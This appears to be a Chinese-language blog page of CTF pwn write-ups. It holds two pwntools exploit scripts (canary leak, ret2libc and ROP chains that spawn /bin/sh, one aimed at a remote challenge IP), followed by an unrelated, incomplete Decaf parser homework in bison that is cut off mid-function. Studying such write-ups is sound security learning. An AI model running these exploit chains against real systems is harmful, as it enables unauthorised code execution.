    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')

# Short aliases for the tube methods.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: lg evaluates the *name* it is given; only pass trusted variable names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be a single byte: b'\x00' (the three-byte b'x00' makes ljust raise).
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

def debug():
    """Attach GDB to the target with a breakpoint at 0x4008DB."""
    gdb.attach(p,"b *0x4008DB\n")
    #gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
    #pause()

#debug()

name = "1"
times = 16
sla("What is your name?\n> ",name)
sla("How many times do you want to try?\n> ",str(times))
# A NUL byte is not a valid "%lf" token, so scanf stores nothing and the
# uninitialised double (lined up with the canary) is printed back.
sla("Time[sec]: ","\x00")
p.recvuntil("Stop the timer as close to ")
leak_addr = ru(" ")[:-1]
# Re-encode the printed double as its 8 raw bytes, hex-encode them and
# reverse the whole hex string.
leak_addr = struct.pack("<d", float(leak_addr))
leak_addr = str(binascii.hexlify(leak_addr)[::-1])
success("leak_addr >> "+leak_addr)

# Reversing the string also swapped the two digits of every byte; swap them back.
canary = ""
for i in range(0, len(leak_addr), 2):
    canary += leak_addr[i+1] + leak_addr[i]
canary = eval("0x"+canary)
success("canray >> "+hex(canary))

pop_rdi_ret = 0x0000000000400e93
ret = 0x00000000004006a6

sl('\n')
# Round 1: keep the canary intact and print the GOT entry of __libc_start_main.
# presumably 0x4006D0 is puts@plt and 0x40089B is ask_again — TODO confirm
payload = "a"*0x18 + p64(canary) + "b"*0x8 + p64(pop_rdi_ret) + p64(elf.got['__libc_start_main']) + p64(0x4006D0) + p64(0x40089B)
sla('Play again? (Y/n) ',payload)
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x23fc0
success("leak_addr >>" + hex(leak_addr))
success("libc_base >> " + hex(libc_base))

system = libc_base + libc.sym["system"]
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Round 2: the same overflow again, this time calling system("/bin/sh").
payload = "a"*0x18+ p64(canary) + "b"*0x8 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
sla("Play again? (Y/n) ",payload)

p.interactive()

guess

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.
1
2
3
4
5
6
guess: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f21aadafb56dc99d5daac322fec33bd876bbbf3d, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

1
2
3
4
5
6
7
8
9
10
unsigned __int64 __fastcall start_routine(void *a1)
{
char buf[24]; // [rsp+0h] [rbp-20h] BYREF
unsigned __int64 v3; // [rsp+18h] [rbp-8h]

v3 = __readfsqword(0x28u);
puts("> ");
gets(buf);
return __readfsqword(0x28u) ^ v3;
}

使用了多线程,新线程的栈空间和 TLS 离得很近,可以尝试覆盖 canary

1
2
pthread_create(newthread, 0LL, (void *(*)(void *))start_routine, 0LL);
pthread_join(newthread[0], 0LL);

入侵思路

1
2
3
4
5
6
__int64 __fastcall readu(__int64 a1)
{
fflush(stdout);
__isoc99_scanf("%lu", a1);
return readr(10);
}

由于程序使用 scanf 作为输入,因此可以通过 \x00 使 scanf 输入失败,进而不会覆盖栈上的数据

1
2
3
4
5
if ( numg - 1 == indexg )
{
puts("Sorry, that was the last guess!");
printf("You entered %lu but the right number was %lu\n", input, ram);
}

然后就可以将 input 原本所占栈空间的值给泄露出来,计算偏移得到 pro_base

现在有一次栈溢出的机会,比赛时尝试了很多的方法但都失败了:

  • 不能使用 printf 泄露数据,可能是覆盖了 TLS 上的关键数据导致 printf 报错
  • 尝试万能 pop 打 csu 时发现程序使用 mov edi, r12d,导致 puts 的第一个参数写不上地址
  • 尝试回到 main start 写循环但又有莫名其妙的报错
  • 尝试执行 pthread_create 也有报错

最后发现劫持返回地址为 pro_base + 0x14D9 不会报错,并且能泄露 libc_base:

1
2
3
4
5
payload = "a"*24 + "\x00"*16 
#payload += csu(0, 1, pthread_create_got, bss_addr, 0, main_addr, csu_front_addr)
payload += p64(pop_rdi_ret)+p64(puts_got)+p64(pro_base + 0x14D9)
payload += "\x00"*0x800+"\x00"*8*8
sla("> ",payload)

最后打一个 execve("/bin/sh") 就可以了

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
# -*- coding:utf-8 -*-
from pwn import *

# Target word size (32 or 64) and path of the challenge binary.
arch = 64
challenge = './guess'

context.os='linux'
#context.log_level = 'debug'

if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

# Short aliases for the tube methods; `p` is resolved when an alias is called,
# so they may be defined before the connection exists.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: lg evaluates the *name* it is given; only pass trusted variable names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be a single byte: b'\x00' (the three-byte b'x00' makes ljust raise).
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# local = 1 starts the binary as a child process, 0 connects to the remote service.
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach GDB with a PIE-relative breakpoint, then wait for a key press."""
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x1484)\n")
    pause()

def cmd(op):
    """Send menu choice `op` once the ">" prompt has been received."""
    sla(">",str(op))

#debug()
size = 0x20-9
sla("Enter the size : ",str(size))
num = 2
sla("Enter the number of tries : ",str(num))
# A NUL byte makes scanf("%lu") store nothing, so the stale stack value in
# `input` survives and is echoed back after the last guess.
for i in range(2):
    sla("Enter your guess :","\x00")

p.recvuntil("You entered ")
# NOTE(review): eval() runs on data received from the target; int() would be
# the safer parser for this decimal number (the ljust pad is a no-op for any
# value of 8+ characters).
leak_addr = eval(p.recvuntil(" ").ljust(8,"\x00"))
pro_base = leak_addr - 0x1579
success("leak_addr >> "+hex(leak_addr))
success("pro_base >> "+hex(pro_base))

bss_addr = pro_base + 0x4010

# Gadget and GOT addresses, all relative to the leaked PIE base.
pop_rdi_ret = 0x0000000000001793 + pro_base
pop_rsi_ret = 0x0000000000001791 + pro_base
pop_rbp_ret = 0x00000000000012f3 + pro_base
call_rax = 0x0000000000001014 + pro_base

csu_front_addr=0x1770+pro_base
csu_end_addr=0x178A+pro_base

print_got = 0x3F80+ pro_base
puts_got = 0x3F68 + pro_base
pthread_create_got = 0x3F60 + pro_base
main_addr = 0x15CF + pro_base

def csu(rbx, rbp, r15,r12, r13, r14, last):
    """Build a ret2csu chain from the two __libc_csu_init gadgets.

    Usage: csu(0, 1, fun_got, rdi, rsi, rdx, last)

    rbx  -- should be 0
    rbp  -- should be 1, so the loop in the gadget is not taken again
    r15  -- the function to call (must be the address of a GOT entry)
    r12  -- becomes edi (only the low 32 bits: rdi = edi = r12d)
    r13  -- becomes rsi
    r14  -- becomes rdx
    last -- address returned to after the call
    """
    # First gadget: pop rbx, rbp, r12, r13, r14, r15; ret
    payload = p64(csu_end_addr)
    payload += p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
    # Second gadget: move the registers into place and call [r15 + rbx*8].
    payload += p64(csu_front_addr)
    # Filler consumed by the `add rsp, 8` and six pops that follow the call.
    payload += b'a' * 0x38
    payload += p64(last)
    return payload

# Stage 1: overflow, call puts(puts_got) to leak a libc pointer, then continue
# at pro_base + 0x14D9 (presumably back inside the vulnerable routine).
# The payload is built from bytes literals: concatenating a str with the bytes
# returned by p64() raises TypeError on Python 3, while bytes work on 2 and 3.
payload = b"a"*24 + b"\x00"*16
#payload += csu(0, 1, pthread_create_got, bss_addr, 0, main_addr, csu_front_addr)
payload += p64(pop_rdi_ret)+p64(puts_got)+p64(pro_base + 0x14D9)
# Long run of zero bytes after the chain -- presumably reaches and zeroes the
# stored stack-canary copy so the 16 zero bytes above pass the check; TODO confirm.
payload += b"\x00"*0x800+b"\x00"*8*8
sla("> ",payload)

p.recvuntil("\n")
# puts() stops at the first NUL, so only the 6 significant address bytes
# arrive; pad them to 8 bytes before unpacking.
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
# 0x80970 is presumably the offset of puts in the target libc -- verify.
libc_base = leak_addr - 0x80970
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

# Stage 2: resolve libc addresses and send the final chain, which loads
# rdi = "/bin/sh", rdx = 0, rsi = 0, rax = 59 (execve on x86-64 Linux) and
# then jumps to a syscall gadget.
system = libc_base + libc.sym["system"]
# Search with a bytes needle so the lookup works on Python 3 as well.
binsh_addr = libc_base + next(libc.search(b"/bin/sh"))
# Presumably gadget offsets inside the target libc -- TODO confirm.
pop_rdx_ret = libc_base + 0x0000000000001b96
pop_rax_ret = libc_base + 0x000000000001b500
syscall = libc_base + 0x0000000000002743

# Bytes literals: str + p64() bytes raises TypeError on Python 3.
payload = b"a"*24 + b"\x00"*16
payload += p64(pop_rdi_ret)+p64(binsh_addr)
payload += p64(pop_rdx_ret)+p64(0)
# Two values follow pop_rsi_ret -- presumably the gadget pops a second
# register before returning; verify.
payload += p64(pop_rsi_ret)+p64(0)+p64(0)
payload += p64(pop_rax_ret)+p64(59)
payload += p64(syscall)
sla("> ",payload)

p.interactive()

decafast

本作业的目标是为 Decaf 编程语言编写一个语法分析器

Decaf 中词汇元素的详细信息在 Decaf 规范中:Decaf Programming Language Specification

为 Decaf 语言编写解析器,为合法的 Decaf 程序生成抽象语法树

  • 抽象语法树(AST)是程序结构,无需在源代码中包含所有详细信息,它可以被认为是一个抽象的表示
  • 要生成的抽象语法树使用 Zephyr 抽象语法定义语言(ASDL)来描述(这是一种用于序列化抽象语法树的方法)

实验描述

使用 Decaf 规范作为指导,完成一个 Decaf 语言的语法分析器

请务必遵守以下要求:

  • 如果程序成功解析输入,则应使用 exit(EXIT_SUCCESS) 退出程序
  • 如果您的程序在输入的 Decaf 程序中发现错误,则应使用 exit(EXIT_FAILURE) 退出
  • 程序生成的抽象语法树必须采用上面指定的格式,输出规范在 /compilers-class-hw/decafast/Decaf.asdl 中提供
  • 不要在输出中添加空格,这可能会导致将输出与参考输出匹配时出现问题

使用 Python 程序 zipout.py 在测试用例上运行您的解决方案程序;您的解决方案必须在目录 answer 中编译,并且可执行文件必须命名为 decafast。针对所有测试用例运行,如下所示:

1
python3 zipout.py
  • 这将创建一个名为 output 的目录和一个可以根据参考输出文件进行检查的文件 output.zip
1
python3 check.py 
  • 这将检查您解决方案的准确性

实验步骤

您需要使用在 HW1 中构建的词法分析器,因此需要将 decaflex 中的词法分析器 decaflex.lex 复制到 /compilers-class-hw/decafast/answer

目录 /compilers-class-hw/decafast/answer 中存在这个作业的一个不完整的解决方案,本实验要求构造该方案的副本,因此要执行下列命令:

1
2
3
cp default.cc decafast.cc
cp default.lex decafast.lex
cp default.y decafast.y
  • decafast.cc:修改 #include "default.tab.h" 以替换为 #include "decafast.tab.h"
  • decafast.y:修改 #include "default.cc" 以替换为 #include "decafast.cc"
  • decafast.lex:仅将令牌模式定义从 HW1 中的 decaflex.lex 复制到 decafast.lex,不要从 main 复制任何内容,因为 decafast.y 中有一个新的 main 函数
  • PS:T_PACKAGE,T_LCB,T_RCB,T_ID 这4个 token 需使用 default.lex 中的默认值,忽略 T_WHITESPACE

通过运行以下命令构建可执行文件 decafast

1
make decafast

该实验提供了一个未完成案例 default.y

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
%{
#include <iostream>
#include <ostream>
#include <string>
#include <cstdlib>
#include "default-defs.h"

int yylex(void);
int yyerror(char *);

// print AST?
bool printAST = true;

#include "decafast.cc"

using namespace std;

%}

%define parse.error verbose

%union{ // 该样例程序只提供了两个可选类型:树节点,字符串
class decafAST *ast;
std::string *sval;
}

%token T_PACKAGE
%token T_LCB
%token T_RCB
%token <sval> T_ID

%type <ast> extern_list decafpackage

%%

start: program

program: extern_list decafpackage
{
ProgramAST *prog = new ProgramAST((decafStmtList *)$1, (PackageAST *)$2);
if (printAST) {
cout << getString(prog) << endl;
}
delete prog;
}

extern_list: /* extern_list can be empty */
{ decafStmtList *slist = new decafStmtList(); $$ = slist; }
;

decafpackage: T_PACKAGE T_ID T_LCB T_RCB
{ $$ = new PackageAST(*$2, new decafStmtList(), new decafStmtList()); delete $2; }
;

%%

int main() {
// parse the input and create the abstract syntax tree
int retval = yyparse();
return(retval >= 1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

decafast.cc 中提供了3个节点的类结构:

1
2
3
4
5
class decafAST {
public:
virtual ~decafAST() {}
virtual string str() { return string(""); }
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
class decafStmtList : public decafAST { /* 管理decaf语句 */
list<decafAST *> stmts;
public:
decafStmtList() {}
~decafStmtList() {
for (list<decafAST *>::iterator i = stmts.begin(); i != stmts.end(); i++) {
delete *i;
}
}
int size() { return stmts.size(); }
void push_front(decafAST *e) { stmts.push_front(e); }
void push_back(decafAST *e) { stmts.push_back(e); }
string str() { return commaList<class decafAST *>(stmts); }
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* AST node for a decaf package: a name plus its field and method
   declaration lists, both deleted together with the node. */
class PackageAST : public decafAST {
    string Name;
    decafStmtList *FieldDeclList;
    decafStmtList *MethodDeclList;
public:
    PackageAST(string name, decafStmtList *fieldlist, decafStmtList *methodlist)
        : Name(name), FieldDeclList(fieldlist), MethodDeclList(methodlist) {}
    ~PackageAST() {
        // delete on a null pointer is a no-op, so no explicit NULL test is needed.
        delete FieldDeclList;
        delete MethodDeclList;
    }
    // Renders as Package(<name>,<fields>,<methods>); a null list prints as "None"
    // through getString.
    string str() {
        string fields = getString(FieldDeclList);
        string methods = getString(MethodDeclList);
        string text("Package");
        text += "(";
        text += Name;
        text += ",";
        text += fields;
        text += ",";
        text += methods;
        text += ")";
        return text;
    }
};
1
2
3
4
5
6
7
8
9
10
11
/* Root AST node of a decaf program: the extern declaration list followed by
   the package definition; both are deleted together with the node. */
class ProgramAST : public decafAST {
    decafStmtList *ExternList;
    PackageAST *PackageDef;
public:
    ProgramAST(decafStmtList *externs, PackageAST *c) : ExternList(externs), PackageDef(c) {}
    ~ProgramAST() {
        // delete on a null pointer is a no-op, so no explicit NULL test is needed.
        delete ExternList;
        delete PackageDef;
    }
    // Renders as Program(<externs>,<package>).
    string str() {
        string externs = getString(ExternList);
        string package = getString(PackageDef);
        string text("Program");
        text += "(";
        text += externs;
        text += ",";
        text += package;
        text += ")";
        return text;
    }
};
  • 在分析的过程中需要为每一个可能的节点设置对应的类

最开始尝试的时候比较迷茫,不知道从何入手,于是先看一个程序提供的案例来进行分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
extern func print_int(int) void;
extern func read_int() int;

package Catalan {

func main() void {
print_int( cat( read_int() ) );
}

// factorial of n
func fact(n int) int {
if (n == 1) { return(1); }
else { return(n*fact(n-1)); }
}

// a choose b
func choose(a int, b int) int {
return( fact(a) / (fact(b)*fact(a-b)) );
}

// catalan number of n
func cat(n int) int {
return( choose(2*n,n)/(n+1) );
}

}
1
Program(ExternFunction(print_int,VoidType,VarDef(IntType)),ExternFunction(read_int,IntType,None),Package(Catalan,None,Method(main,VoidType,None,MethodBlock(None,MethodCall(print_int,MethodCall(cat,MethodCall(read_int,None))))),Method(fact,IntType,VarDef(n,IntType),MethodBlock(None,IfStmt(BinaryExpr(Eq,VariableExpr(n),NumberExpr(1)),Block(None,ReturnStmt(NumberExpr(1))),Block(None,ReturnStmt(BinaryExpr(Mult,VariableExpr(n),MethodCall(fact,BinaryExpr(Minus,VariableExpr(n),NumberExpr(1))))))))),Method(choose,IntType,VarDef(a,IntType),VarDef(b,IntType),MethodBlock(None,ReturnStmt(BinaryExpr(Div,MethodCall(fact,VariableExpr(a)),BinaryExpr(Mult,MethodCall(fact,VariableExpr(b)),MethodCall(fact,BinaryExpr(Minus,VariableExpr(a),VariableExpr(b)))))))),Method(cat,IntType,VarDef(n,IntType),MethodBlock(None,ReturnStmt(BinaryExpr(Div,MethodCall(choose,BinaryExpr(Mult,NumberExpr(2),VariableExpr(n)),VariableExpr(n)),BinaryExpr(Plus,VariableExpr(n),NumberExpr(1))))))))
  • 在 Program 中并列了3个节点:ExternFunction,ExternFunction,Package
  • 在每个节点中又详细描述了它的基础信息

模仿上述结构,可以写一个初版分析器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
%{
#include <iostream>
#include <ostream>
#include <string>
#include <cstdlib>
#include "default-defs.h"

int yylex(void);
int yyerror(char *);

// print AST?
bool printAST = true;

#include "decafast.cc"

using namespace std;

%}

%define parse.error verbose

%union{
class decafAST *ast;
std::string *sval;
}

%token T_PACKAGE T_EXTERN T_FUNC T_SEMICOLON T_COMMA T_CONTINUE T_FALSE T_TRUE T_VAR T_FOR T_NULL T_RETURN T_WHITESPACE
%token T_AND T_ASSIGN T_DIV T_DOT T_EQ T_RIGHTSHIFT T_GEQ T_GT T_LEFTSHIFT T_LEQ T_LT T_MINUS T_MOD T_MULT T_NEQ T_NOT T_OR T_PLUS
%token T_VOID T_INTTYPE T_BOOLTYPE T_STRINGTYPE
%token T_LCB T_RCB T_LPAREN T_RPAREN T_LSB T_RSB
%token T_COMMENT
%token T_BREAK T_ELSE T_IF T_WHILE
%token <sval> T_ID T_INTCONSTANT T_CHARCONSTANT T_STRINGCONSTANT

%type <ast> state_if state_while state_for state_break state_continue state_return exp assign method_call lvalue statements statement extern_list para_list_use para_usen para_use para_list_def block blockt var_decls var_decl method_decls method_decl decafpackage extern_def extern_defn extern_typen extern_type func_typen func_type method_type array_type type

%%

start: program

program: extern_list decafpackage{
ProgramAST *prog = new ProgramAST((decafStmtList *)$1, (PackageAST *)$2);
if (printAST) {
cout << getString(prog) << endl;
}
delete prog;
}
;

extern_list: extern_defn {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

extern_defn: extern_def extern_defn {
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

extern_def: T_EXTERN T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type T_SEMICOLON {
decafEXFuncDef *func = new decafEXFuncDef();
decafPara* para = (decafPara*)$5;
decafType * type = (decafType *)$7;
func->put_name($3);
func->put_type(type->get_type());
func->put_para((decafPara*)para);
$$ = func;
delete $3;
}
;

para_list_use: para_usen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

para_usen: para_use T_COMMA para_usen {
decafStmtList * para = (decafStmtList *)$3;
para->push_front($1);
$$ = para;
}
| para_use {
decafStmtList * para = new decafStmtList();
para->push_front($1);
$$ = para;
}
;

para_use: method_call { $$ = $1;}
| exp {$$ = $1;}
;


para_list_def: extern_typen {
$$ = $1;
}
| func_typen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

func_typen: func_type T_COMMA func_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| func_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

func_type: T_ID extern_type {
decafType* type = (decafType*)$2;
type->put_name($1);
$$ = type;
delete $1;
}
;

extern_typen: extern_type T_COMMA extern_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| extern_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

extern_type: T_STRINGTYPE { decafType* type = new decafType("StringType"); $$ = type;}
| type { decafType* type = (decafType* )$1; $$ = type;}
;

method_type: T_VOID { decafType* type = new decafType("VoidType"); $$ = type;}
| type { decafType* type = (decafType* )$1; $$ = type;}
;

array_type: T_LSB T_INTCONSTANT T_RSB type {

}
;

type: T_INTTYPE { decafType* type = new decafType("IntType"); $$ = type;}
| T_BOOLTYPE { decafType* type = new decafType("BoolType"); $$ = type;}
;

decafpackage: T_PACKAGE T_ID T_LCB var_decls method_decls T_RCB {
decafStmtList *field = (decafStmtList *)$4;
decafStmtList *method = (decafStmtList *)$5;
$$ = new PackageAST(*$2, field, method);
delete $2;
}
| T_PACKAGE T_ID T_LCB T_RCB {
$$ = new PackageAST(*$2, new decafStmtList(), new decafStmtList());
delete $2;
}
;

var_decls: var_decl var_decls{
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

var_decl: T_VAR T_ID type T_SEMICOLON {

}
| T_VAR T_ID array_type T_SEMICOLON {

}
| T_VAR T_ID type T_ASSIGN CONSTANT T_SEMICOLON {

}
;

CONSTANT : T_INTCONSTANT | T_CHARCONSTANT | T_STRINGCONSTANT { };

method_decls: method_decl method_decls{
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

method_decl: T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type block {
decafFuncDef *func = new decafFuncDef();
decafPara* para = (decafPara*)$4;
decafStmtList * block = (decafStmtList*)$7;
decafType * type = (decafType *)$6;
func->put_name($2);
func->put_type(type->get_type());
func->put_para(para);
func->put_block(block);
$$ = func;
delete $2;
}
;

blockt: T_LCB var_decls statements T_RCB {
decafStmtList *field = (decafStmtList *)$2;
decafStmtList *state = (decafStmtList *)$3;
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafStmtList *field = new decafStmtList();
decafStmtList *state = new decafStmtList();
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
;

block: T_LCB var_decls statements T_RCB {
decafStmtList *field = (decafStmtList *)$2;
decafStmtList *state = (decafStmtList *)$3;
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafStmtList *field = new decafStmtList();
decafStmtList *state = new decafStmtList();
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
;

statements: statement statements {
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

statement: blockt { $$ = $1; }
| assign T_SEMICOLON { $$ = $1; }
| method_call T_SEMICOLON { $$ = $1; }
| state_return T_SEMICOLON { $$ = $1; }
| state_if { $$ = $1; }
| state_while { $$ = $1; }
| state_for { $$ = $1; }
| state_break T_SEMICOLON { $$ = $1; }
| state_continue T_SEMICOLON { $$ = $1; }
| {}
;

state_if: T_IF T_LPAREN exp T_RPAREN blockt T_ELSE blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafBlock *else_block = (decafBlock *)$7;
decafIF *ifs = new decafIF(exp,if_block,else_block);
$$ = ifs;
}
| T_IF T_LPAREN exp T_RPAREN blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafIF *ifs = new decafIF(exp,if_block,NULL);
$$ = ifs;
}
;

state_while: {}
;

state_for: {}
;

state_break: {}
;

state_continue: {}
;

state_return: T_RETURN T_LPAREN exp T_RPAREN {
decafAllexp *exp = (decafAllexp *)$3;
decafReturn *ret = new decafReturn(exp);
$$ = ret;
}
;

assign: lvalue T_ASSIGN exp {

}
;

lvalue: T_ID { }
| T_ID T_LSB exp T_RSB { }
;

exp : T_ID { decafAllexp * exp = new decafAllexp(*$1,"VariableExpr"); $$ = exp; }
| T_INTCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; }
| T_CHARCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; }
| T_STRINGCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; }
| method_call { $$ = $1; }
| T_NOT exp { decafBinexp * exp = new decafBinexp("Not", (decafAllexp*)$2, NULL); $$ = exp; }
| T_MINUS exp { decafBinexp * exp = new decafBinexp("Minus", (decafAllexp*)$2, NULL); $$ = exp; }
| exp T_PLUS exp { decafBinexp * exp = new decafBinexp("Plus", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MINUS exp { decafBinexp * exp = new decafBinexp("Minus", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MULT exp { decafBinexp * exp = new decafBinexp("Mult", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_DIV exp { decafBinexp * exp = new decafBinexp("Div", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MOD exp { decafBinexp * exp = new decafBinexp("Mod", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LEFTSHIFT exp { decafBinexp * exp = new decafBinexp("Leftshift", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_RIGHTSHIFT exp { decafBinexp * exp = new decafBinexp("Rightshift", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LEQ exp { decafBinexp * exp = new decafBinexp("Leq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_GEQ exp { decafBinexp * exp = new decafBinexp("Geq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LT exp { decafBinexp * exp = new decafBinexp("Lt", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_GT exp { decafBinexp * exp = new decafBinexp("Gt", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_EQ exp { decafBinexp * exp = new decafBinexp("Eq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_NEQ exp { decafBinexp * exp = new decafBinexp("Neq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_AND exp { decafBinexp * exp = new decafBinexp("And", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_OR exp { decafBinexp * exp = new decafBinexp("Or", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| T_LPAREN exp T_RPAREN { $$ = $2; }
| {}
;

method_call: T_ID T_LPAREN para_list_use T_RPAREN {
decafFunCall *call = new decafFunCall();
decafStmtList* para = (decafStmtList*)$3;
call->put_name($1);
call->put_para(para->get_para());
$$ = call;
delete $1;
}
;

%%


int main() {
// parse the input and create the abstract syntax tree
int retval = yyparse();
